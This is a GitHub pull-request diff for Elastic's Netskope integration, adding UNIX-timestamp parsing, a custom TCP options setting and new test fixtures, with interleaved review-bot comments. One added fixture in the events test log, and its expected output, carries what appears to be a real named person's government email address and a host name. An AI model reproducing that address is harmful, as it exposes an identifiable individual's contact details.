https://github.com/elastic/integrations/pull/9472 +- version: "1.17.1" + changes: + - description: Fix the date processor to support UNIX format + type: bugfix + link: https://github.com/elastic/integrations/pull/9431 +- version: "1.17.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9403 - version: "1.16.1" changes: - description: Changed owners diff --git a/packages/netskope/data_stream/alerts/_dev/test/pipeline/test-alerts.log b/packages/netskope/data_stream/alerts/_dev/test/pipeline/test-alerts.log index 90d04039fcf..39e6ea16383 100644 
--- a/packages/netskope/data_stream/alerts/_dev/test/pipeline/test-alerts.log +++ b/packages/netskope/data_stream/alerts/_dev/test/pipeline/test-alerts.log 
@@ -25,3 +25,4 @@ {"event":{"id":"abc123a1a53aad"},"netskope":{"alerts":{"insertion_epoch_timestamp":1656621348,"acked":"true","is_alert":"no","alert":{"name":"test-alert","type":"breach"},"type":"Compromised Credential","breach":{"date":1505484800,"description":"Test alert description","id":"abcdefghd857e3cfbdb6d5704b48484","media_references":"null","score":40,"target_references":"test"},"category":{"name":"Credential"},"cci":"0","ccl":"unknown","count":1,"email":{"source":"Client"},"external":{"email":1},"matched":{"username":"user@example.com"},"organization":{"unit":"null"},"other":{"categories":"null"},"app":{"category":"app"}}},"@timestamp":"2022-05-15T15:34:26.000Z","user":{"email":{"1":"user@example.com","2":"user@example.com","3":"user@example.com"}}} {"event":{"id":"123abb3426a0ffa82a"},"netskope":{"alerts":{"insertion_epoch_timestamp":1556584553,"access_method":"Client","acked":"false","action":"block","activity":{"name":"Browse"},"is_alert":"yes","alert":{"name":"alert","type":"Test"},"app":{"name":"test-app","category":"test","session":{"id":"123488558609175"}},"category":{"name":"null"},"cci":"0","ccl":"unknown","count":1,"device":{"name":"Mac Device"},"organization":{"unit":"null"},"other":{"categories":"null"},"policy":{"name":"Test block 
policy"},"request":{"id":"21323452216123"},"site":"[test-site]","traffic":{"type":"CloudApp"},"type":"policy","url":"www.example.com\/","connection":{"id":"1234108856823906"},"managed":{"app":"yes"},"netskope_pop":"test-pop","severity":{"level":"unknown"}}},"user_agent":{"name":"Chrome","os":{"name":"Chrome","version":"91.0"}},"destination":{"geo":{"country_iso_code":"AT","location":{"lat":-90,"lon":-180},"city_name":"Vienna","region_name":"Vienna","postal_code":"1040","timezone":"Europe\/Vienna"},"address":"81.2.69.144","ip":"81.2.69.144"},"source":{"geo":{"country_iso_code":"RO","location":{"lat":90,"lon":180},"city_name":"Cluj-Napoca","region_name":"Cluj","postal_code":"400420","timezone":"Europe\/Bucharest"},"address":"81.2.69.144","ip":"81.2.69.144"},"@timestamp":"2022-05-16T10:22:26.000Z","user":{"email":{"1":"user@example.com","2":"user@example.com","3":"user@example.com"}},"network":{"protocol":"HTTPS"}} {"event":{"id":"abcd19518cee24e"},"netskope":{"alerts":{"insertion_epoch_timestamp":1659940011,"access_method":"Client","acked":"false","action":"block","activity":{"name":"Upload","status":"Access Denied"},"is_alert":"yes","alert":{"id":"5312ab7ce55506bf055047551a5ecc55","name":"test_alert","type":"nspolicy"},"app":{"name":"test-app","category":"Collaboration","session":{"id":"1320712336"}},"category":{"name":"Collaboration"},"cci":"89","ccl":"excellent","count":1,"device":{"name":"Windows Device","classification":"unmanaged"},"destination":{"geoip_src":1},"event":{"type":"sequence"},"event_source_channel":"application","managed":{"app":"yes"},"object":{"name":"TestResult.jpg","type":"File"},"organization":{"unit":"null"},"orig_ty":"nspolicy","other":{"categories":"['Cloud 
Storage']"},"page":{"url":"","site":"example..com"},"policy":{"name":"test-policy","actions":"['Upload']"},"profile":{"id":"test-profile"},"severity":{"level":"high"},"site":"example.com","source":{"geoip_src":2},"telemetry":{"app":"null"},"threshold":{"value":343},"traffic":{"type":"CloudApp"},"transaction":{"id":"78945610225424"},"type":"uba","url":"example.com\/abc\/test.txt","user":{"ip":"81.2.69.144"},"browser":{"session":{"id":"1232810986401"}},"last":{"app":"test-app","country":"US","device":"Device","location":"Columbus","region":"Ohio","timestamp":1650005},"slc_longitude":"80.2784729004","uba_ap1":"test_uba_ap12","uba_ap2":"test_uba_ap2","uba_inst1":"test_uba_inst1","uba_inst2":"test_uba_inst2","connection":{"id":"1234566742606078"},"instance":{"id":"5623027123"},"parent":{"id":"\/exammple\/test"},"referer":"https:\/\/ ","slc_latitude":"13.0878400803"}},"user_agent":{"name":"Chrome","os":{"name":"Windows","version":"10.0"}},"destination":{"geo":{"country_iso_code":"US","location":{"lat":null,"lon":null},"city_name":"Redmond","region_name":"Washington","postal_code":"98052","timezone":"America\/Los_Angeles"},"address":"81.2.69.142","ip":"81.2.69.142"},"file":{"size":13224532,"hash":{"md5":"5eb63bbbe01eeed093cb22bb8f5acdc3"}},"source":{"geo":{"country_iso_code":"IN","location":{"lat":null,"lon":null},"city_name":"Chennai","region_name":"Tamil Nadu","postal_code":"600004","timezone":"N\/A"},"address":"81.2.69.142","ip":"81.2.69.144"},"@timestamp":"2022-04-10T06:00:05.000Z","user":{"email":{"1":"user@example.com","2":"user@example.com"}}} +{"event":{"id":"abcd19518cee24e"},"netskope":{"alerts":{"insertion_epoch_timestamp":1659940011,"access_method":"Client","acked":"false","action":"block","activity":{"name":"Upload","status":"Access 
Denied"},"is_alert":"yes","alert":{"id":"5312ab7ce55506bf055047551a5ecc55","name":"test_alert","type":"nspolicy"},"app":{"name":"test-app","category":"Collaboration","session":{"id":"1320712336"}},"category":{"name":"Collaboration"},"cci":"89","ccl":"excellent","count":1,"device":{"name":"Windows Device","classification":"unmanaged"},"destination":{"geoip_src":1},"event":{"type":"sequence"},"event_source_channel":"application","managed":{"app":"yes"},"object":{"name":"TestResult.jpg","type":"File"},"organization":{"unit":"null"},"orig_ty":"nspolicy","other":{"categories":"['Cloud Storage']"},"page":{"url":"","site":"example..com"},"policy":{"name":"test-policy","actions":"['Upload']"},"profile":{"id":"test-profile"},"severity":{"level":"high"},"site":"example.com","source":{"geoip_src":2},"telemetry":{"app":"null"},"threshold":{"value":343},"traffic":{"type":"CloudApp"},"transaction":{"id":"78945610225424"},"type":"uba","url":"example.com\/abc\/test.txt","user":{"ip":"81.2.69.144"},"browser":{"session":{"id":"1232810986401"}},"last":{"app":"test-app","country":"US","device":"Device","location":"Columbus","region":"Ohio","timestamp":1650005},"slc_longitude":"80.2784729004","uba_ap1":"test_uba_ap12","uba_ap2":"test_uba_ap2","uba_inst1":"test_uba_inst1","uba_inst2":"test_uba_inst2","connection":{"id":"1234566742606078"},"instance":{"id":"5623027123"},"parent":{"id":"\/exammple\/test"},"referer":"https:\/\/ ","slc_latitude":"13.0878400803"}},"user_agent":{"name":"Chrome","os":{"name":"Windows","version":"10.0"}},"destination":{"geo":{"country_iso_code":"US","location":{"lat":null,"lon":null},"city_name":"Redmond","region_name":"Washington","postal_code":"98052","timezone":"America\/Los_Angeles"},"address":"81.2.69.142","ip":"81.2.69.142"},"file":{"size":13224532,"hash":{"md5":"5eb63bbbe01eeed093cb22bb8f5acdc3"}},"source":{"geo":{"country_iso_code":"IN","location":{"lat":null,"lon":null},"city_name":"Chennai","region_name":"Tamil 
Nadu","postal_code":"600004","timezone":"N\/A"},"address":"81.2.69.142","ip":"81.2.69.144"},"@timestamp":"1649570405","user":{"email":{"1":"user@example.com","2":"user@example.com"}}} diff --git a/packages/netskope/data_stream/alerts/_dev/test/pipeline/test-alerts.log-expected.json b/packages/netskope/data_stream/alerts/_dev/test/pipeline/test-alerts.log-expected.json index 389d1167d31..e11012106be 100644 --- a/packages/netskope/data_stream/alerts/_dev/test/pipeline/test-alerts.log-expected.json +++ b/packages/netskope/data_stream/alerts/_dev/test/pipeline/test-alerts.log-expected.json 
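Review bot: The added fixture record is a verbatim copy of the previous one with only `@timestamp` changed to the epoch-seconds string `"1649570405"`, so it reuses the same `event.id` `abcd19518cee24e` and carries forward the earlier record's mismatched `source.address` `81.2.69.142` versus `source.ip` `81.2.69.144`. Giving the new record its own `event.id` (and a consistent source pair) keeps the UNIX-timestamp case distinguishable if any fingerprint or dedup logic on `event.id` is ever added to the pipeline, and stops the copy-forward from being mistaken for deliberate test input. The expected output for this record begins in the next file section and runs past the end of this view.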
@@ -4398,6 +4398,207 @@ "version": "10.0" } } + }, + { + "@timestamp": "2022-04-10T06:00:05.000Z", + "destination": { + "address": "81.2.69.142", + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.142" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "id": "abcd19518cee24e", + "original": "{\"event\":{\"id\":\"abcd19518cee24e\"},\"netskope\":{\"alerts\":{\"insertion_epoch_timestamp\":1659940011,\"access_method\":\"Client\",\"acked\":\"false\",\"action\":\"block\",\"activity\":{\"name\":\"Upload\",\"status\":\"Access Denied\"},\"is_alert\":\"yes\",\"alert\":{\"id\":\"5312ab7ce55506bf055047551a5ecc55\",\"name\":\"test_alert\",\"type\":\"nspolicy\"},\"app\":{\"name\":\"test-app\",\"category\":\"Collaboration\",\"session\":{\"id\":\"1320712336\"}},\"category\":{\"name\":\"Collaboration\"},\"cci\":\"89\",\"ccl\":\"excellent\",\"count\":1,\"device\":{\"name\":\"Windows Device\",\"classification\":\"unmanaged\"},\"destination\":{\"geoip_src\":1},\"event\":{\"type\":\"sequence\"},\"event_source_channel\":\"application\",\"managed\":{\"app\":\"yes\"},\"object\":{\"name\":\"TestResult.jpg\",\"type\":\"File\"},\"organization\":{\"unit\":\"null\"},\"orig_ty\":\"nspolicy\",\"other\":{\"categories\":\"['Cloud 
Storage']\"},\"page\":{\"url\":\"\",\"site\":\"example..com\"},\"policy\":{\"name\":\"test-policy\",\"actions\":\"['Upload']\"},\"profile\":{\"id\":\"test-profile\"},\"severity\":{\"level\":\"high\"},\"site\":\"example.com\",\"source\":{\"geoip_src\":2},\"telemetry\":{\"app\":\"null\"},\"threshold\":{\"value\":343},\"traffic\":{\"type\":\"CloudApp\"},\"transaction\":{\"id\":\"78945610225424\"},\"type\":\"uba\",\"url\":\"example.com\\/abc\\/test.txt\",\"user\":{\"ip\":\"81.2.69.144\"},\"browser\":{\"session\":{\"id\":\"1232810986401\"}},\"last\":{\"app\":\"test-app\",\"country\":\"US\",\"device\":\"Device\",\"location\":\"Columbus\",\"region\":\"Ohio\",\"timestamp\":1650005},\"slc_longitude\":\"80.2784729004\",\"uba_ap1\":\"test_uba_ap12\",\"uba_ap2\":\"test_uba_ap2\",\"uba_inst1\":\"test_uba_inst1\",\"uba_inst2\":\"test_uba_inst2\",\"connection\":{\"id\":\"1234566742606078\"},\"instance\":{\"id\":\"5623027123\"},\"parent\":{\"id\":\"\\/exammple\\/test\"},\"referer\":\"https:\\/\\/ \",\"slc_latitude\":\"13.0878400803\"}},\"user_agent\":{\"name\":\"Chrome\",\"os\":{\"name\":\"Windows\",\"version\":\"10.0\"}},\"destination\":{\"geo\":{\"country_iso_code\":\"US\",\"location\":{\"lat\":null,\"lon\":null},\"city_name\":\"Redmond\",\"region_name\":\"Washington\",\"postal_code\":\"98052\",\"timezone\":\"America\\/Los_Angeles\"},\"address\":\"81.2.69.142\",\"ip\":\"81.2.69.142\"},\"file\":{\"size\":13224532,\"hash\":{\"md5\":\"5eb63bbbe01eeed093cb22bb8f5acdc3\"}},\"source\":{\"geo\":{\"country_iso_code\":\"IN\",\"location\":{\"lat\":null,\"lon\":null},\"city_name\":\"Chennai\",\"region_name\":\"Tamil Nadu\",\"postal_code\":\"600004\",\"timezone\":\"N\\/A\"},\"address\":\"81.2.69.142\",\"ip\":\"81.2.69.144\"},\"@timestamp\":\"1649570405\",\"user\":{\"email\":{\"1\":\"user@example.com\",\"2\":\"user@example.com\"}}}" + }, + "file": { + "hash": { + "md5": "5eb63bbbe01eeed093cb22bb8f5acdc3" + }, + "size": 13224532 + }, + "netskope": { + "alerts": { + "access_method": "Client", 
+ "acked": false, + "action": "block", + "activity": { + "name": "Upload", + "status": "Access Denied" + }, + "alert": { + "id": "5312ab7ce55506bf055047551a5ecc55", + "name": "test_alert", + "type": "nspolicy" + }, + "app": { + "category": "Collaboration", + "name": "test-app", + "session": { + "id": "1320712336" + } + }, + "browser": { + "session": { + "id": "1232810986401" + } + }, + "category": { + "name": "Collaboration" + }, + "cci": "89", + "ccl": "excellent", + "connection": { + "id": "1234566742606078" + }, + "count": 1, + "destination": { + "geoip_src": 1 + }, + "device": { + "classification": "unmanaged", + "name": "Windows Device" + }, + "event": { + "type": "sequence" + }, + "event_source_channel": "application", + "insertion_epoch_timestamp": 1659940011, + "instance": { + "id": "5623027123" + }, + "is_alert": true, + "last": { + "app": "test-app", + "country": "US", + "device": "Device", + "location": "Columbus", + "region": "Ohio", + "timestamp": 1650005 + }, + "managed": { + "app": true + }, + "object": { + "name": "TestResult.jpg", + "type": "File" + }, + "orig_ty": "nspolicy", + "other": { + "categories": "['Cloud Storage']" + }, + "page": { + "site": "example..com" + }, + "parent": { + "id": "/exammple/test" + }, + "policy": { + "actions": "['Upload']", + "name": "test-policy" + }, + "profile": { + "id": "test-profile" + }, + "referer": { + "original": "https:// ", + "scheme": "https" + }, + "severity": { + "level": "high" + }, + "site": "example.com", + "slc_latitude": "13.0878400803", + "slc_longitude": "80.2784729004", + "source": { + "geoip_src": 2 + }, + "threshold": { + "value": 343 + }, + "traffic": { + "type": "CloudApp" + }, + "transaction": { + "id": "78945610225424" + }, + "type": "uba", + "uba_ap1": "test_uba_ap12", + "uba_ap2": "test_uba_ap2", + "uba_inst1": "test_uba_inst1", + "uba_inst2": "test_uba_inst2", + "url": { + "extension": "txt", + "original": "example.com/abc/test.txt", + "path": "example.com/abc/test.txt" + }, + "user": { 
+ "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + } + } + }, + "related": { + "ip": [ + "81.2.69.142", + "81.2.69.144" + ] + }, + "source": { + "address": "81.2.69.142", + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "email": [ + "user@example.com" + ] + }, + "user_agent": { + "name": "Chrome", + "os": { + "name": "Windows", + "version": "10.0" + } + } } ] } \ No newline at end of file diff --git a/packages/netskope/data_stream/alerts/_dev/test/system/test-default-config.yml b/packages/netskope/data_stream/alerts/_dev/test/system/test-default-config.yml index 551b76d32f4..bfb7a7a220c 100644 --- a/packages/netskope/data_stream/alerts/_dev/test/system/test-default-config.yml +++ b/packages/netskope/data_stream/alerts/_dev/test/system/test-default-config.yml @@ -5,3 +5,5 @@ vars: data_stream: vars: listen_port: 9020 +assert: + hit_count: 8 diff --git a/packages/netskope/data_stream/alerts/agent/stream/tcp.yml.hbs b/packages/netskope/data_stream/alerts/agent/stream/tcp.yml.hbs index bc587e50a3a..e22fd3aa545 100644 --- a/packages/netskope/data_stream/alerts/agent/stream/tcp.yml.hbs +++ b/packages/netskope/data_stream/alerts/agent/stream/tcp.yml.hbs @@ -12,6 +12,9 @@ publisher_pipeline.disable_host: true {{#if ssl}} ssl: {{ssl}} {{/if}} +{{#if tcp_options}} +{{tcp_options}} +{{/if}} {{#if processors}} processors: {{processors}} 
diff --git a/packages/netskope/data_stream/alerts/elasticsearch/ingest_pipeline/default.yml b/packages/netskope/data_stream/alerts/elasticsearch/ingest_pipeline/default.yml index e4fc349139d..f09b3ca4892 100644 --- a/packages/netskope/data_stream/alerts/elasticsearch/ingest_pipeline/default.yml +++ b/packages/netskope/data_stream/alerts/elasticsearch/ingest_pipeline/default.yml @@ -7,7 +7,15 @@ processors: - json: field: message add_to_root: true + tag: json_message add_to_root_conflict_strategy: replace + on_failure: + - append: + field: error.message + value: >- + Processor '{{ _ingest.on_failure_processor_type }}' + {{#_ingest.on_failure_processor_tag}}with tag '{{ _ingest.on_failure_processor_tag }}' + {{/_ingest.on_failure_processor_tag}}failed with message '{{ _ingest.on_failure_message }}' - rename: field: message target_field: event.original @@ -102,6 +110,7 @@ processors: if: ctx['@timestamp'] != null && ctx['@timestamp'] != '' formats: - ISO8601 + - UNIX on_failure: - set: field: '@timestamp' @@ -1305,8 +1314,8 @@ processors: if: ctx.user?.email != null lang: painless source: >- - def parts = ctx.user.email; if (parts != null && parts.size() > 0) { - + def parts = ctx.user.email; + if (!(parts instanceof String)) { List l = new ArrayList(); for (entry in parts.entrySet()) { diff --git a/packages/netskope/data_stream/alerts/manifest.yml b/packages/netskope/data_stream/alerts/manifest.yml index 73acd6e99cc..e5d3044a278 100644 --- a/packages/netskope/data_stream/alerts/manifest.yml +++ b/packages/netskope/data_stream/alerts/manifest.yml 
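Review bot: The rewritten guard `if (!(parts instanceof String))` in the third hunk of the user.email script lets any non-string value through and then calls `parts.entrySet()`, so a JSON array of addresses would still fail at that call where a Map was expected; the positive form `if (parts instanceof Map) {` states the precondition the loop actually needs and keeps both strings and lists out of `entrySet()`. The remainder of the script, including any `on_failure` handler that would decide whether such a failure is recorded or drops the document, lies outside the hunk. The `- UNIX` format added to the `@timestamp` date processor is what lets the new epoch-seconds fixture parse; a one-line comment there such as `# Netskope sends @timestamp either as ISO8601 or as epoch seconds` would save the next reader a trip to the test log.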
@@ -31,6 +31,18 @@ streams: type: bool multi: false default: false + - name: tcp_options + title: Custom TCP Options + type: yaml + description: Specify custom configuration options for the TCP input. See [TCP](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-tcp.html) for details. + required: false + show_user: false + multi: false + default: | + #max_message_size: 20MiB + #max_connections: 1 + #framing: delimiter + #line_delimiter: "\n" - name: processors type: yaml title: Processors diff --git a/packages/netskope/data_stream/alerts/sample_event.json b/packages/netskope/data_stream/alerts/sample_event.json index 61e53a626aa..6297e352893 100644 --- a/packages/netskope/data_stream/alerts/sample_event.json +++ b/packages/netskope/data_stream/alerts/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2021-12-23T16:27:09.000Z", "agent": { - "ephemeral_id": "f351413b-f36f-45a3-aa1f-1334e718f39a", - "id": "c0ee214c-57e5-4a60-80ba-e4dc247eb02e", + "ephemeral_id": "275c19c7-0f2c-467b-850f-c153e4a77147", + "id": "7b99f48c-6c10-4dad-86c4-ee578beef412", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.0" + "version": "8.0.0" }, "data_stream": { "dataset": "netskope.alerts", @@ -32,14 +32,14 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "c0ee214c-57e5-4a60-80ba-e4dc247eb02e", + "id": "7b99f48c-6c10-4dad-86c4-ee578beef412", "snapshot": false, - "version": "8.9.0" + "version": "8.0.0" }, "event": { "agent_id_status": "verified", "id": "f621f259f5fbde850ad5593a", - "ingested": "2023-07-27T15:55:05Z" + "ingested": "2024-03-29T07:17:15Z" }, "file": { "hash": { @@ -56,7 +56,7 @@ }, "log": { "source": { - "address": "172.18.0.4:33326" + "address": "192.168.224.6:60788" } }, "netskope": { @@ -177,4 +177,4 @@ "name": "unknown" } } -} +} \ No newline at end of file 
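Review bot: The description of the new `tcp_options` variable does not tell the operator that the block is spliced into the stream configuration verbatim, at the same nesting level as the dedicated settings such as the `ssl` block visible in the `tcp.yml.hbs` hunk, so a key repeated there collides with the dedicated option and, depending on how the agent parses the YAML, is either rejected or silently wins. I would append to the description: `Keys set here are merged at the input level and can override the dedicated settings above (for example the SSL block); prefer the dedicated options where they exist.` Keeping `show_user: false` is reasonable, but the warning belongs in the text advanced users will read when they expand it.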
diff --git a/packages/netskope/data_stream/events/_dev/test/pipeline/test-events.log b/packages/netskope/data_stream/events/_dev/test/pipeline/test-events.log index 76c2d58f864..c042d9a099d 100644 --- a/packages/netskope/data_stream/events/_dev/test/pipeline/test-events.log +++ b/packages/netskope/data_stream/events/_dev/test/pipeline/test-events.log 
@@ -17,3 +17,5 @@ {"netskope":{"events":{"event_type":"application","insertion":{"timestamp":1655213123},"access_method":"API Connector","activity":{"name":"Download"},"alert":{"is_present":"yes"},"app":{"name":"null","activity":"DOWNLOAD","category":"Cloud Storage"},"category":{"name":"Cloud Storage"},"cci":"86","ccl":"high","count":1,"device":{"type":"Other"},"instance":{"id":"instance_test"},"object":{"name":"test.txt","id":"12357668","type":"File"},"organization_unit":"null","other":{"categories":"null"},"site":"null","source":{"geoip_src":2},"traffic":{"type":"CloudApp"},"type":"nspolicy","user":{"category":"Internal","ip":"81.2.69.144"}}},"event":{"id":"123f357a5241c6f"},"user":{"email":{"1":"Introspection","2":"user@example.com","3":"user@example.com","4":"user@example.com","5":"user@example.com"},"name":"null","roles":"unknown"},"user_agent":{"name":"unknown","os":{"name":"unknown"}},"source":{"geo":{"country_iso_code":"DE","location":{"lat":90,"lon":180},"city_name":"Frankfurt am Main","region_name":"Hesse","postal_code":"N\/A"},"address":"81.2.69.144","ip":"81.2.69.144"},"@timestamp":"2021-09-12T11:31:21.000Z"} {"netskope":{"events":{"event_type":"network","destination":{"geoip":{"source":1}},"insertion":{"timestamp":1612221062},"access_method":"Unknown","app":{"name":"unknown","category":"n\/a"},"category":{"name":"null"},"ccl":"unknown","count":1,"device":{"type":"Other"},"ip":{"protocol":"TCP"},"netskope_pop":"test_pop","numbytes":0,"organization_unit":"null","policy":{"name":"default"},"session":{"packets":0},"site":"unknown","total_packets":0,"traffic":{"type":"non-web"},"tunnel":{"id":"10"},"type":"network","source":{"geoip_src":2},"user":{"ip":"81.2.69.144"}}},"event":{"id":"123f2dc700386","action":"block"},"destination":{"geo":{"location":{"lat":0,"lon":0}},"domain":"example.com","address":"89.160.20.128","ip":"81.2.69.144","port":445},"client":{"bytes":0,"packets":0},"user_agent":{"os":{"name":"Windows 
10.0"}},"server":{"bytes":0,"packets":0},"source":{"address":"89.160.20.128","ip":"89.160.20.128","port":49197,"geo":{"country_iso_code":"US","location":{"lat":-90.8234,"lon":-180.7257},"city_name":"Boardman","region_name":"Oregon","postal_code":"97818"}},"@timestamp":"2021-09-19T19:39:39.000Z","user":{"email":{"1":"user@example.com","2":"user@example.com","3":"user@example.com"}}} {"netskope":{"events":{"event_type":"page","insertion":{"timestamp":1623222508},"access_method":"Client","app":{"name":"null","category":"Cloud Storage"},"category":{"name":"Cloud Storage"},"cci":"87","ccl":"high","connection":{"id":"0"},"count":1,"domain":"example.com","organization_unit":"null","page":"example.com\/page","site":"example.com","traffic":{"type":"CloudApp"},"type":"connection","user":{"generated":"no","ip":"89.160.20.112"},"url":"example.com","is_bypass_traffic":"no","transaction":{"id":"0"}}},"event":{"id":"123asd25fe48c2b3d"},"destination":{"geo":{"country_iso_code":"US","location":{"lat":null,"lon":null},"city_name":"Tappahannock","region_name":"Virginia","timezone":"America\/New_York","postal_code":"22560"},"address":"89.160.20.112","ip":"89.160.20.112","port":443},"source":{"geo":{"country_iso_code":"US","location":{"lat":null,"lon":null},"city_name":"Columbus","region_name":"Ohio","timezone":"America\/New_York","postal_code":"43215"},"address":"89.160.20.128","ip":"89.160.20.128"},"@timestamp":"2022-02-12T12:02:32.020Z","user":{"email":{"1":"user@example.com","2":"user@example.com","3":"user@example.com"}}} +{"netskope":{"events":{"event_type":"page","insertion":{"timestamp":1623222508},"access_method":"Client","app":{"name":"null","category":"Cloud Storage"},"category":{"name":"Cloud 
Storage"},"cci":"87","ccl":"high","connection":{"id":"0"},"count":1,"domain":"example.com","organization_unit":"null","page":"example.com\/page","site":"example.com","traffic":{"type":"CloudApp"},"type":"connection","user":{"generated":"no","ip":"89.160.20.112"},"url":"example.com","is_bypass_traffic":"no","transaction":{"id":"0"}}},"event":{"id":"123asd25fe48c2b3d"},"destination":{"geo":{"country_iso_code":"US","location":{"lat":null,"lon":null},"city_name":"Tappahannock","region_name":"Virginia","timezone":"America\/New_York","postal_code":"22560"},"address":"89.160.20.112","ip":"89.160.20.112","port":443},"source":{"geo":{"country_iso_code":"US","location":{"lat":null,"lon":null},"city_name":"Columbus","region_name":"Ohio","timezone":"America\/New_York","postal_code":"43215"},"address":"89.160.20.128","ip":"89.160.20.128"},"@timestamp":"1644667352","user":{"email":{"1":"user@example.com","2":"user@example.com","3":"user@example.com"}}} +{"event": {"id": "acac39573978cb1e8332da9c"}, "source": {"ip": "127.0.0.1", "geo": {"country_iso_code": "AU"}}, "destination": {"ip": "127.0.0.1", "geo": {"country_iso_code": "HK"}}, "user": {"email": "sandra.bourke@sunshinecoast.qld.gov.au"}, "@timestamp": "2024-03-14T04:28:19.000Z", "host": {"hostname": "C422093"}, "user_agent": {"device": {"name": "Windows Device"}, "os": {"name": "Windows 10"}, "name": "Edge"}} diff --git a/packages/netskope/data_stream/events/_dev/test/pipeline/test-events.log-expected.json b/packages/netskope/data_stream/events/_dev/test/pipeline/test-events.log-expected.json index 6934061ff27..97c838956a5 100644 --- a/packages/netskope/data_stream/events/_dev/test/pipeline/test-events.log-expected.json +++ b/packages/netskope/data_stream/events/_dev/test/pipeline/test-events.log-expected.json 
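Review bot: The second added fixture line contains what appears to be a real person's mailbox at a real government domain (`sandra.bourke@sunshinecoast.qld.gov.au`) plus a host name `C422093`, while every other line in this file uses `user@example.com`; test data committed to a public repository should not identify real individuals. I would replace the address with an RFC 2606 value such as `user@example.com` and the host with a neutral name, then regenerate the expected JSON that embeds the same string in `event.original`. If the line was lifted from a customer report, the same value may need scrubbing from wherever it came from.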
@@ -2178,6 +2178,164 @@ "user@example.com" ] } + }, + { + "@timestamp": "2022-02-12T12:02:32.000Z", + "destination": { + "address": "89.160.20.112", + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, + "ip": "89.160.20.112", + "port": 443 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "id": "123asd25fe48c2b3d", + "original": "{\"netskope\":{\"events\":{\"event_type\":\"page\",\"insertion\":{\"timestamp\":1623222508},\"access_method\":\"Client\",\"app\":{\"name\":\"null\",\"category\":\"Cloud Storage\"},\"category\":{\"name\":\"Cloud Storage\"},\"cci\":\"87\",\"ccl\":\"high\",\"connection\":{\"id\":\"0\"},\"count\":1,\"domain\":\"example.com\",\"organization_unit\":\"null\",\"page\":\"example.com\\/page\",\"site\":\"example.com\",\"traffic\":{\"type\":\"CloudApp\"},\"type\":\"connection\",\"user\":{\"generated\":\"no\",\"ip\":\"89.160.20.112\"},\"url\":\"example.com\",\"is_bypass_traffic\":\"no\",\"transaction\":{\"id\":\"0\"}}},\"event\":{\"id\":\"123asd25fe48c2b3d\"},\"destination\":{\"geo\":{\"country_iso_code\":\"US\",\"location\":{\"lat\":null,\"lon\":null},\"city_name\":\"Tappahannock\",\"region_name\":\"Virginia\",\"timezone\":\"America\\/New_York\",\"postal_code\":\"22560\"},\"address\":\"89.160.20.112\",\"ip\":\"89.160.20.112\",\"port\":443},\"source\":{\"geo\":{\"country_iso_code\":\"US\",\"location\":{\"lat\":null,\"lon\":null},\"city_name\":\"Columbus\",\"region_name\":\"Ohio\",\"timezone\":\"America\\/New_York\",\"postal_code\":\"43215\"},\"address\":\"89.160.20.128\",\"ip\":\"89.160.20.128\"},\"@timestamp\":\"1644667352\",\"user\":{\"email\":{\"1\":\"user@example.com\",\"2\":\"user@example.com\",\"3\":\"user@example.com\"}}}" + }, + "netskope": { + "events": { + "access_method": "Client", + "app": { + "category": "Cloud Storage" + }, + 
"category": { + "name": "Cloud Storage" + }, + "cci": "87", + "ccl": "high", + "connection": { + "id": "0" + }, + "count": 1, + "domain": "example.com", + "event_type": "page", + "insertion": { + "timestamp": 1623222508 + }, + "is_bypass_traffic": false, + "page": "example.com/page", + "site": "example.com", + "traffic": { + "type": "CloudApp" + }, + "transaction": { + "id": "0" + }, + "type": "connection", + "url": { + "extension": "com", + "original": "example.com", + "path": "example.com" + }, + "user": { + "generated": false, + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, + "ip": "89.160.20.112" + } + } + }, + "related": { + "ip": [ + "89.160.20.112", + "89.160.20.128" + ] + }, + "source": { + "address": "89.160.20.128", + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, + "ip": "89.160.20.128" + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "email": [ + "user@example.com" + ] + } + }, + { + "@timestamp": "2024-03-14T04:28:19.000Z", + "destination": { + "geo": { + "country_iso_code": "HK" + }, + "ip": "127.0.0.1" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "id": "acac39573978cb1e8332da9c", + "original": "{\"event\": {\"id\": \"acac39573978cb1e8332da9c\"}, \"source\": {\"ip\": \"127.0.0.1\", \"geo\": {\"country_iso_code\": \"AU\"}}, \"destination\": {\"ip\": \"127.0.0.1\", \"geo\": {\"country_iso_code\": \"HK\"}}, \"user\": {\"email\": \"sandra.bourke@sunshinecoast.qld.gov.au\"}, \"@timestamp\": \"2024-03-14T04:28:19.000Z\", \"host\": {\"hostname\": \"C422093\"}, \"user_agent\": {\"device\": {\"name\": \"Windows Device\"}, \"os\": 
